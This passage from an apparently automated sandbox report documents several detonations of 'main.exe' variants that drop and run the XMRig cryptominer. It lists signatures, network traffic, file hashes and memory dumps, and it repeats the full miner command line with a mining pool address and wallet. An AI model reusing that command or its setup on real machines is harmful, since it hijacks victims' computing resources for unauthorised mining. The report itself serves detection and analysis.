| PID 2104 wrote to memory of 4444 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2104 wrote to memory of 4444 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4444-16-0x000001E8354D0000-0x000001E8354F0000-memory.dmp
memory/4444-17-0x000001E8C9230000-0x000001E8C9250000-memory.dmp
memory/4444-18-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-19-0x000001E8C9680000-0x000001E8C96A0000-memory.dmp
memory/4444-20-0x000001E8C98B0000-0x000001E8C98D0000-memory.dmp
memory/4444-21-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-22-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-23-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-24-0x000001E8C9680000-0x000001E8C96A0000-memory.dmp
memory/4444-25-0x000001E8C98B0000-0x000001E8C98D0000-memory.dmp
memory/4444-26-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-27-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-28-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-29-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-30-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-31-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-32-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-33-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-34-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-35-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-36-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-37-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-38-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-39-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-40-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-41-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-42-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-43-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-44-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-45-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-46-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-47-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-48-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-49-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-50-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-51-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-52-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-53-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-54-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-55-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-56-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-57-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-58-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-59-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-60-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-61-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-62-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-63-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-64-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-65-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-66-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-67-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-68-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-69-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-70-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-71-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-72-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-73-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-74-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-75-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-76-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-77-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-78-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-79-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-80-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-81-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-82-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-83-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-84-0x00007FF675300000-0x00007FF675E03000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3396 wrote to memory of 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3396 wrote to memory of 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3440-16-0x000002396ABA0000-0x000002396ABC0000-memory.dmp
memory/3440-17-0x000002396C4A0000-0x000002396C4C0000-memory.dmp
memory/3440-18-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-20-0x000002396C4E0000-0x000002396C500000-memory.dmp
memory/3440-19-0x000002396C4C0000-0x000002396C4E0000-memory.dmp
memory/3440-21-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-22-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-25-0x000002396C4E0000-0x000002396C500000-memory.dmp
memory/3440-24-0x000002396C4C0000-0x000002396C4E0000-memory.dmp
memory/3440-23-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-26-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-27-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-28-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-29-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-30-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-31-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-32-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-33-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-34-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-35-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-36-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-37-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-38-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-39-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-40-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-41-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-42-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-43-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-44-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-45-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-46-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-47-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-48-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-49-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-50-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-51-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-52-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-53-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-54-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-55-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-56-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-57-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-58-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-59-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-60-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-61-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-62-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-63-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-64-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-65-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-66-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-67-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-68-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-69-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-70-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-71-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-72-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-73-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-74-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-75-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-76-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-77-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-78-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-79-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-80-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-81-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-82-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-83-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
memory/3440-84-0x00007FF65AA10000-0x00007FF65B513000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3660 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3660 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4008-16-0x000001ADDE2E0000-0x000001ADDE300000-memory.dmp
memory/4008-17-0x000001ADDE330000-0x000001ADDE350000-memory.dmp
memory/4008-18-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-19-0x000001ADDE370000-0x000001ADDE390000-memory.dmp
memory/4008-20-0x000001ADDE350000-0x000001ADDE370000-memory.dmp
memory/4008-21-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-22-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-23-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-25-0x000001ADDE350000-0x000001ADDE370000-memory.dmp
memory/4008-24-0x000001ADDE370000-0x000001ADDE390000-memory.dmp
memory/4008-26-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-27-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-28-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-29-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-30-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-31-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-32-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-33-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-34-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-35-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-36-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-37-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-38-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-39-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-40-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-41-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-42-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-43-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-44-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-45-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-46-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-47-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-48-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-49-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-50-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-51-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-52-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-53-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-54-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-55-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-56-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-57-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-58-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-59-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-60-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-61-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-62-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-63-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-64-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-65-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-66-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-67-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-68-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-69-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-70-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
memory/4008-71-0x00007FF71D560000-0x00007FF71E063000-memory.dmp
